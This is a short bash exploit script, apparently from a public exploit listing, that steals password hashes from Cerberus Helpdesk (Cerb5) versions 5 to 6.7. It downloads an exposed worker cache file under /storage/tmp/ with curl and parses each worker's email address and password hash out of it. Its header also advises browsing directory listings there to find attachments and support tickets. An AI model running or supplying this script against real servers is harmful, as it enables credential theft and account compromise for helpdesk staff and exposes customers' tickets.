38 lines
No EOL
1.9 KiB
Bash
Executable file
38 lines
No EOL
1.9 KiB
Bash
Executable file
#!/bin/bash
|
|
#####################################################################################
|
|
# Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing #
|
|
# Date: 04.02.2016 #
|
|
# Exploit Author: asdizzle_ #
|
|
# Vendor Homepage: http://www.cerberusweb.com/ #
|
|
# Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #
|
|
# Version: 5 - 6.7 #
|
|
# Tested on: Debian 8 / apache2 with cerb 5 #
|
|
#####################################################################################
|
|
# Prerequisites: #
|
|
# -At least one worker must be logged in #
|
|
# -/storage/tmp/ dir must be accessible #
|
|
# #
|
|
# If everything else fails try if there's directory listing in /storage/tmp #
|
|
# You might find attachments and even support tickets. #
|
|
#####################################################################################
|
|
|
|
url='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)
|
|
pre='devblocks' # If this doesn't work try 'zend'
|
|
|
|
echo "[*] Trying to fetch cache file"
|
|
|
|
cachechk=$(curl -s $url"/storage/tmp/"$pre"_cache---ch_workers" | grep pass)
|
|
if [ -z "$cachechk" ];then
|
|
echo "[-] File not found."
|
|
exit
|
|
else
|
|
echo "[+] Found. Extracting..."
|
|
hashes=$(echo "$cachechk" | sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g')
|
|
if [ -z "$hashes" ];then
|
|
echo "[-] Hash extracting failed"
|
|
else
|
|
echo "[+] Extracting seems to have worked"
|
|
echo
|
|
echo "$hashes"
|
|
fi
|
|
fi |